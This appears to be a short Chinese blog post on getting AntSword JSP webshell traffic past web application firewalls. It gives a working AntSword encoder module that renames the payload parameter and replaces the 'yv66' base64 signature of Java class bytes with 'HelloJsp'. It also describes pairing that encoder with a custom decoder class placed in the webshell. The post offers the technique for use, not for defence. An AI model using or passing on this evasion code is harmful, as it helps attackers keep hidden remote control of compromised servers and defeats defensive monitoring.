前言
Jsp的WebShell连接总会碰到WAF拦截yv66
,属于是蚁剑JspWebShell的一个特征。
Jsp的编码器与解码器思路类似于C#。同时,在多参数传参的时候,蚁剑也默认加了随机前缀长度,因此只需考虑解决恶意类的特征问题,还是用之前的思路,拦哪换哪。
编码器
/**
* jsp::base64替换编码器
* Create at: 2023/01/03 12:34:21
*/
'use strict';
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
data[pwd] = data['_'];
delete data['_'];
data[pwd] = data[pwd].replace(/yv66/g, "HelloJsp");
return data;
}
解码器
Jsp的解码器传的是个类,我们可以编写各种解码器的类然后随意更换使用。
详细使用方法可以看官方文档:
https://github.com/AntSwordProject/AntSword-JSP-Decoder
编译后将class文件进行base64编码填入解码器即可。
Webshell
仅比生成shell的webshell多一行代码